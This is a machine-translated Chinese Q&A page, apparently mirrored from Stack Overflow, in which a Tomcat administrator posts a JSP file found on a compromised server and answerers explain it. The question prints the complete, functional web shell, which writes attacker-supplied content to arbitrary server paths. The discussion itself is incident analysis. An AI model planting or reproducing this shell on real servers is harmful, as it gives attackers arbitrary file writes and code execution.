这是什么代码在做

我有一个最近被利用的web应用程序。该服务器是tomcat 7.0.42。我在服务器上找到了我没有上传的文件。你知道他们为什么出现？在这里，我向你展示其中一个文件的内容，有谁能告诉我它想做什么？这是什么代码在做

<%@ page language="java" pageEncoding="gbk"%> 
<jsp:directive.page import="java.io.File"/> 
<jsp:directive.page import="java.io.OutputStream"/> 
<jsp:directive.page import="java.io.FileOutputStream"/> 

<% int i=0; String method=request.getParameter("act"); if(method!=null && method.equals("yoco")) { 
    String url=request.getParameter("url"); 
    String text=request.getParameter("smart"); 
    File f=new File(url); 
    if(f.exists()) { 
     f.delete(); 
    } 
    try{ 
     OutputStream o=new FileOutputStream(f); 
     o.write(text.getBytes()); 
     o.close(); 
    } catch (Exception e) { 
     i++; 
    %>0<% 
    } 
} 
if(i==0){ 
    %>1<% 
}%> 
<form action='?act=yoco' method='post'> 
<input size="100" value="<%=application.getRealPath("/") %>" name="url"> 
<br> 
<textarea rows="20" cols="80" name="smart">

来源

2013-11-27 leccionesonline

我认为是从的内容写入文件。基本上谁发送这个可以写任何.jsp文件并在你的服务器上执行。这是一种“攻击”形式，您应该将其删除并检查您的密码/服务器的安全性。 – <span class="text-secondary"> <small> <span></span> </small> </span> </p> </div> </div> </div> <div itemprop="comment" class="post-comment"> <div class="row"> <div class="col-lg-1"><span class="text-secondary">+1</span></div> <div class="col-lg-11"> <p class="commenttext">看起来像一个特洛伊木马，试图用内容替换一些jsp作为“智能”参数发送和执行它... – <span class="text-secondary"> <small> <span></span> </small> </span> </p> </div> </div> </div> </div> </div> </article> </div> <div class="answer-title"> <span class="text-logo margin-top-sm">A</span> <h2 class="title h4">回答</h2> </div> <div class="item-description text-md markdown-body margin-bottom-40 voidso"> <article class="board-top-1 padding-top-10"> <div class="post-col vote-info"> <span class="count">2<i class="fa fa-thumbs-up"></i></span> </div> <div class="post-offset"> <div class="answer fmt"> <p>这看起来像一个为攻击者提供远程控制的rootkit。他们正在向同一个JSP servlet进行表单发布。当收到发布请求时，通过POST请求发送给它的参数值被保存并处理;</p> <pre><code class="prettyprint-override">String url=request.getParameter("url"); String text=request.getParameter("smart"); </code></pre> <p>通知经由参数<code class="prettyprint-override">url</code>接收的值在变量<code class="prettyprint-override">url</code>保持。然后他们检查以确保参数值，在删除之前确实存在为文件 - 使用;</p> <pre><code class="prettyprint-override">File f=new File(url); if(f.exists()) { f.delete(); } </code></pre> <p>最后第二个参数<code class="prettyprint-override">smart</code>参数<code class="prettyprint-override">text</code>举行。然后将其用作使用参数<code class="prettyprint-override">url</code>作为文件路径创建的新文件的内容。</p> <pre><code class="prettyprint-override">OutputStream o=new FileOutputStream(f); o.write(text.getBytes()); o.close(); </code></pre> </div> <div class="post-info"> <div class="post-meta row"> <p class="text-secondary col-lg-6"> <span class="source"> <a rel="noopener" target="_blank" href="https://stackoverflow.com/q/20243622">来源</a> </span> </p> <p class="text-secondary col-lg-6"> <span class="float-right date"> <span>2013-11-27 13:19:16</span> <a rel="noopener" target="_blank" href="https://stackoverflow.com/users/340390/">Bitmap</a></span> </p> <p class="col-12"></p> <p class="col-12"></p></div> </div> </div> </article> <div> <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-6208739752673518" data-ad-slot="1038284119" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> </div> <article class="board-top-1 padding-top-10"> <div class="post-col vote-info"> <span class="count">2<i class="fa fa-thumbs-up"></i></span> </div> <div class="post-offset"> <div class="answer fmt"> <p>这段代码使用了一个名为<code class="prettyprint-override">url</code>参数和一个叫<code class="prettyprint-override">text</code>参数，采用的<code class="prettyprint-override">text</code>内容并把它写到一个文件由<code class="prettyprint-override">url</code>定义的Web服务器上。</p> <p>实质上，客户端可以将任意文本上传到Web /应用程序服务器上任何可写的文件。</p> <p>听起来完全一样。</p> </div> <div class="post-info"> <div class="post-meta row"> <p class="text-secondary col-lg-6"> <span class="source"> <a rel="noopener" target="_blank" href="https://stackoverflow.com/q/20243698">来源</a> </span> </p> <p class="text-secondary col-lg-6"> <span class="float-right date"> <span>2013-11-27 13:23:11</span> <a rel="noopener" target="_blank" href="https://stackoverflow.com/users/1649198/">Brandon</a></span> </p> <p class="col-12"></p> <p class="col-12"></p></div> </div>  <div class="comments"> <div itemprop="comment" class="post-comment"> <div class="row"> <div class="col-lg-1"><span class="text-secondary">+0</span></div> <div class="col-lg-11"> <p class="commenttext">我可以上传我的应用程序，然后删除该文件夹的写入权限，所以没有人可以写一个新的文件？ – <span class="text-secondary"> <small> <a rel="noopener" target="_blank" href="https://stackoverflow.com/users/1370047/">leccionesonline</a></span> <span></span> </small> </span> </p> </div> </div> </div> <div itemprop="comment" class="post-comment"> <div class="row"> <div class="col-lg-1"><span class="text-secondary">+0</span></div> <div class="col-lg-11"> <p class="commenttext">当然，但其他文件和目录呢？临时目录总是可写的。这不是你“锁定”或试图挤进沙盒的那种代码。我建议你找一个更好的方法。 – <span class="text-secondary"> <small> <a rel="noopener" target="_blank" href="https://stackoverflow.com/users/1649198/">Brandon</a></span> <span></span> </small> </span> </p> </div> </div> </div> </div> </div> </article> <article class="board-top-1 padding-top-10"> <div class="post-col vote-info"> <span class="count">2<i class="fa fa-thumbs-up"></i></span> </div> <div class="post-offset"> <div class="answer fmt"> <p>这是将新文件写入服务器的方法。</p> <p>这个小的.jsp过程的GET请求，如果有一个“YOCO”和“URL”，它试图消除在URL的文件，然后它会尝试在URL到的内容写入到所述文件参数。</p> <p>写入文件后，可以运行该文件输入它的位置。</p> <p>此外，如果成功则输出1，如果尝试写入文件失败则输出0。</p> </div> <div class="post-info"> <div class="post-meta row"> <p class="text-secondary col-lg-6"> <span class="source"> <a rel="noopener" target="_blank" href="https://stackoverflow.com/q/20243738">来源</a> </span> </p> <p class="text-secondary col-lg-6"> <span class="float-right date"> <span>2013-11-27 13:24:58</span> </p> <p class="col-12"></p> <p class="col-12"></p></div> </div> </div> </article> </div> <div class="clearfix"> </div> <div class="relative-box"> <div class="relative">相关问题</div> <ul class="relative_list"> <li> 1. <a href="http://www.uwenku.com/question/p-mjthdewa-bck.html" target="_blank" title="这是什么行代码是做"> 这是什么行代码是做 </a> </li> <li> 2. <a href="http://www.uwenku.com/question/p-acexjkhs-rs.html" target="_blank" title="这段代码在这里做什么？"> 这段代码在这里做什么？ </a> </li> <li> 3. <a href="http://www.uwenku.com/question/p-psgsgvps-w.html" target="_blank" title="这个C代码是做什么的？"> 这个C代码是做什么的？ </a> </li> <li> 4. <a href="http://www.uwenku.com/question/p-anjflbuv-rc.html" target="_blank" title="这个clojure代码是做什么的？"> 这个clojure代码是做什么的？ </a> </li> <li> 5. <a href="http://www.uwenku.com/question/p-rxhilzpd-zt.html" target="_blank" title="这是什么JS代码做"> 这是什么JS代码做 </a> </li> <li> 6. <a href="http://www.uwenku.com/question/p-gckzlend-zk.html" target="_blank" title="这段Javascript代码是做什么的？"> 这段Javascript代码是做什么的？ </a> </li> <li> 7. <a href="http://www.uwenku.com/question/p-ecvlyawr-sz.html" target="_blank" title="这行PHP代码是做什么的？"> 这行PHP代码是做什么的？ </a> </li> <li> 8. <a href="http://www.uwenku.com/question/p-ozvrwksu-bew.html" target="_blank" title="这段java代码是做什么的？"> 这段java代码是做什么的？ </a> </li> <li> 9. <a href="http://www.uwenku.com/question/p-knhvawyb-boc.html" target="_blank" title="这个Groovy代码是做什么的？"> 这个Groovy代码是做什么的？ </a> </li> <li> 10. <a href="http://www.uwenku.com/question/p-pgtgfbuw-cp.html" target="_blank" title="这是什么代码做perl的"> 这是什么代码做perl的 </a> </li> <div> <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <ins class="adsbygoogle" style="display:block; text-align:center;" data-ad-layout="in-article" data-ad-format="fluid" data-ad-client="ca-pub-6208739752673518" data-ad-slot="4606349252"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> </div> <li> 11. <a href="http://www.uwenku.com/question/p-wgmuglfz-rd.html" target="_blank" title="这个jquery代码是做什么的？"> 这个jquery代码是做什么的？ </a> </li> <li> 12. <a href="http://www.uwenku.com/question/p-qqdqtaoy-nh.html" target="_blank" title="这行Python代码是做什么的？"> 这行Python代码是做什么的？ </a> </li> <li> 13. <a href="http://www.uwenku.com/question/p-ajdndzhh-pe.html" target="_blank" title="这个java代码是做什么的？"> 这个java代码是做什么的？ </a> </li> <li> 14. <a href="http://www.uwenku.com/question/p-hvztyary-ps.html" target="_blank" title="这个Scheme代码是做什么的？"> 这个Scheme代码是做什么的？ </a> </li> <li> 15. <a href="http://www.uwenku.com/question/p-kdcrugbd-vu.html" target="_blank" title="这个rails代码是做什么的？"> 这个rails代码是做什么的？ </a> </li> <li> 16. <a href="http://www.uwenku.com/question/p-gmqzdqlv-bdx.html" target="_blank" title="这些代码是做什么的？"> 这些代码是做什么的？ </a> </li> <li> 17. <a href="http://www.uwenku.com/question/p-emgalmzm-vr.html" target="_blank" title="这段代码是做什么的？"> 这段代码是做什么的？ </a> </li> <li> 18. <a href="http://www.uwenku.com/question/p-gkxrggqy-kk.html" target="_blank" title="这段C++代码是做什么的？"> 这段C++代码是做什么的？ </a> </li> <li> 19. <a href="http://www.uwenku.com/question/p-unmtaavt-ps.html" target="_blank" title="这个c/++代码是做什么的？"> 这个c/++代码是做什么的？ </a> </li> <li> 20. <a href="http://www.uwenku.com/question/p-rpmgwhdm-py.html" target="_blank" title="这段C代码是做什么的？"> 这段C代码是做什么的？ </a> </li> <li> 21. <a href="http://www.uwenku.com/question/p-fcyeaavd-bmr.html" target="_blank" title="jquery - 这行代码是做什么的？"> jquery - 这行代码是做什么的？ </a> </li> <li> 22. <a href="http://www.uwenku.com/question/p-vttvakve-cm.html" target="_blank" title="这行C＃代码是做什么的？"> 这行C＃代码是做什么的？ </a> </li> <li> 23. <a href="http://www.uwenku.com/question/p-uateeqee-ov.html" target="_blank" title="这段Python代码是做什么的？"> 这段Python代码是做什么的？ </a> </li> <li> 24. <a href="http://www.uwenku.com/question/p-yhujwiho-xc.html" target="_blank" title="这个xkcd代码是做什么的？"> 这个xkcd代码是做什么的？ </a> </li> <li> 25. <a href="http://www.uwenku.com/question/p-mtuyltld-bhb.html" target="_blank" title="这个VHDL代码是做什么的？"> 这个VHDL代码是做什么的？ </a> </li> <li> 26. <a href="http://www.uwenku.com/question/p-hiyyxnrd-bkk.html" target="_blank" title="这个JS代码是做什么的？"> 这个JS代码是做什么的？ </a> </li> <li> 27. <a href="http://www.uwenku.com/question/p-qmivcqpw-bho.html" target="_blank" title="这段代码是做什么的？"> 这段代码是做什么的？ </a> </li> <li> 28. <a href="http://www.uwenku.com/question/p-atzdjmeo-bnw.html" target="_blank" title="这些代码行是做什么的？"> 这些代码行是做什么的？ </a> </li> <li> 29. <a href="http://www.uwenku.com/question/p-ndzrrxxo-eu.html" target="_blank" title="这行代码是做什么的？"> 这行代码是做什么的？ </a> </li> <li> 30. <a href="http://www.uwenku.com/question/p-aobbrhpe-n.html" target="_blank" title="这个python代码是做什么的？"> 这个python代码是做什么的？ </a> </li> </ul> </div> <div> <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <ins class="adsbygoogle" style="display:block" data-ad-format="autorelaxed" data-ad-client="ca-pub-6208739752673518" data-ad-slot="1575177025"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> </div> <div class="padding-top-10"></div> </div> </div> <script type="text/javascript" src="http://img.uwenku.com/uwenku/script/side.js?t=1644592048176"></script> <script type="text/javascript" src="http://img.uwenku.com/uwenku/plugin/highlight/highlight.pack.js"></script> <link href="http://img.uwenku.com/uwenku/plugin/highlight/styles/docco.css" media="screen" rel="stylesheet" type="text/css" /> <script type="text/javascript"> $('pre').each(function(i, e) { hljs.highlightBlock(e, "<span class='indent'> </span>", false) }); </script> <div class="col-lg-3 col-md-4 col-sm-5"> <div id="rightTop"> <div class="row sidebar panel panel-default"> <div class="panel-heading font-bold"> 每日一句 </div> <div class="panel-body m-b-sm m-t-sm clearfix"> 每一个你不满意的现在，都有一个你没有努力的曾经。 </div> </div> <div class="row"> <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-6208739752673518" data-ad-slot="5415218910" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> </div> <div class="row sidebar panel panel-default"> <div class="panel-heading font-bold"> 最新问题 </div> <div class="m-b-sm m-t-sm clearfix"> <ul class="side_article_list"> <li class="side_article_list_item"> 1. <a href="http://www.uwenku.com/question/p-tvgmrvpy-hb.html" target="_blank" title="Spyder 3.1.4 - 操作系统升级后无法配置Spyder"> Spyder 3.1.4 - 操作系统升级后无法配置Spyder </a> </li> <li class="side_article_list_item"> 2. <a href="http://www.uwenku.com/question/p-nrnjrlra-kr.html" target="_blank" title="能从应用程序的BeginRequest在第一次请求使用RewritePath"> 能从应用程序的BeginRequest在第一次请求使用RewritePath </a> </li> <li class="side_article_list_item"> 3. <a href="http://www.uwenku.com/question/p-xyxztndm-hw.html" target="_blank" title="如何使用带空格的HTML Git Diff？"> 如何使用带空格的HTML Git Diff？ </a> </li> <li class="side_article_list_item"> 4. <a href="http://www.uwenku.com/question/p-fsgdmwpl-eb.html" target="_blank" title="如何使用setActiveItem进行卡片布局以基于radiobuttton选择显示面板？"> 如何使用setActiveItem进行卡片布局以基于radiobuttton选择显示面板？ </a> </li> <li class="side_article_list_item"> 5. <a href="http://www.uwenku.com/question/p-zcmykspd-dh.html" target="_blank" title="为什么如果（a！= 65）没有执行？"> 为什么如果（a！= 65）没有执行？ </a> </li> <li class="side_article_list_item"> 6. <a href="http://www.uwenku.com/question/p-vdmsgred-ex.html" target="_blank" title="字符串中最后2个括号之间的所有大写字母的正则表达式"> 字符串中最后2个括号之间的所有大写字母的正则表达式 </a> </li> <li class="side_article_list_item"> 7. <a href="http://www.uwenku.com/question/p-fricngen-z.html" target="_blank" title="由不同的解决方案调用的一个共享项目中的JS文件"> 由不同的解决方案调用的一个共享项目中的JS文件 </a> </li> <li class="side_article_list_item"> 8. <a href="http://www.uwenku.com/question/p-aiwiznwb-d.html" target="_blank" title="Java 8 DateTimeFormatterBuilder（）。appendOptional不工作"> Java 8 DateTimeFormatterBuilder（）。appendOptional不工作 </a> </li> <li class="side_article_list_item"> 9. <a href="http://www.uwenku.com/question/p-eoqvbwzw-cc.html" target="_blank" title="传数据从小孩到在母体阵营节目类型错误"> 传数据从小孩到在母体阵营节目类型错误 </a> </li> <li class="side_article_list_item"> 10. <a href="http://www.uwenku.com/question/p-pjpbavcz-bmd.html" target="_blank" title="谷歌附近的通知分析"> 谷歌附近的通知分析 </a> </li> </ul> </div> </div> </div> <p class="article-nav-bar"></p> <div class="row sidebar article-nav"> <div class="row box_white visible-sm visible-md visible-lg margin-zero"> <div class="top"> <h3 class="title"><i class="glyphicon glyphicon-th-list"></i> 相关问题</h3> </div> <div class="article-relative-content"> <ul class="side_article_list"> <li class="side_article_list_item"> 1. <a href="http://www.uwenku.com/question/p-mjthdewa-bck.html" target="_blank" title="这是什么行代码是做"> 这是什么行代码是做 </a> </li> <li class="side_article_list_item"> 2. <a href="http://www.uwenku.com/question/p-acexjkhs-rs.html" target="_blank" title="这段代码在这里做什么？"> 这段代码在这里做什么？ </a> </li> <li class="side_article_list_item"> 3. <a href="http://www.uwenku.com/question/p-psgsgvps-w.html" target="_blank" title="这个C代码是做什么的？"> 这个C代码是做什么的？ </a> </li> <li class="side_article_list_item"> 4. <a href="http://www.uwenku.com/question/p-anjflbuv-rc.html" target="_blank" title="这个clojure代码是做什么的？"> 这个clojure代码是做什么的？ </a> </li> <li class="side_article_list_item"> 5. <a href="http://www.uwenku.com/question/p-rxhilzpd-zt.html" target="_blank" title="这是什么JS代码做"> 这是什么JS代码做 </a> </li> <li class="side_article_list_item"> 6. <a href="http://www.uwenku.com/question/p-gckzlend-zk.html" target="_blank" title="这段Javascript代码是做什么的？"> 这段Javascript代码是做什么的？ </a> </li> <li class="side_article_list_item"> 7. <a href="http://www.uwenku.com/question/p-ecvlyawr-sz.html" target="_blank" title="这行PHP代码是做什么的？"> 这行PHP代码是做什么的？ </a> </li> <li class="side_article_list_item"> 8. <a href="http://www.uwenku.com/question/p-ozvrwksu-bew.html" target="_blank" title="这段java代码是做什么的？"> 这段java代码是做什么的？ </a> </li> <li class="side_article_list_item"> 9. <a href="http://www.uwenku.com/question/p-knhvawyb-boc.html" target="_blank" title="这个Groovy代码是做什么的？"> 这个Groovy代码是做什么的？ </a> </li> <li class="side_article_list_item"> 10. <a href="http://www.uwenku.com/question/p-pgtgfbuw-cp.html" target="_blank" title="这是什么代码做perl的"> 这是什么代码做perl的 </a> </li> </ul> </div> </div> </div> </div> </div> </div> </div>  <footer id="footer"> <div class="bg-simple lt"> <div class="container"> <div class="row padder-v m-t"> <div class="col-xs-8"> <ul class="list-inline"> <li><a href="http://www.uwenku.com/contact">联系我们</a></li> <li>© 2020 UWENKU.COM</li> <li><a target="_blank" href="https://beian.miit.gov.cn/">沪ICP备13005482号-4</a></li> <li><script type="text/javascript" src="https://v1.cnzz.com/z_stat.php?id=1280101193&web_id=1280101193"></script></li> <li><a href="http://www.uwenku.com/" target="_blank" title="优文库">简体中文</a></li> <li><a href="http://hk.uwenku.com/" target="_blank" title="優文庫">繁體中文</a></li> <li><a href="http://ru.uwenku.com/" target="_blank" title="поле вопросов и ответов">Русский</a></li> <li><a href="http://de.uwenku.com/" target="_blank" title="Frage - und - antwort - Park">Deutsch</a></li> <li><a href="http://es.uwenku.com/" target="_blank" title="Preguntas y respuestas">Español</a></li> <li><a href="http://hi.uwenku.com/" target="_blank" title="कार्यक्रम प्रश्न और उत्तर पार्क">हिन्दी</a></li> <li><a href="http://it.uwenku.com/" target="_blank" title="IL Programma di chiedere Park">Italiano</a></li> <li><a href="http://ja.uwenku.com/" target="_blank" title="プログラム問答園区">日本語</a></li> <li><a href="http://ko.uwenku.com/" target="_blank" title="프로그램 문답 단지">한국어</a></li> <li><a href="http://pl.uwenku.com/" target="_blank" title="program o park">Polski</a></li> <li><a href="http://tr.uwenku.com/" target="_blank" title="Program soru ve cevap parkı">Türkçe</a></li> <li><a href="http://vi.uwenku.com/" target="_blank" title="Đáp ứng viên">Tiếng Việt</a></li> <li><a href="http://fr.uwenku.com/" target="_blank" title="Programme interrogation Park">Française</a></li> </ul> </div> </div> </div> </div> </div> </footer>  <script> var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?f78a970f17b19a79fc477a3378096f29"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); </script> </body> </html>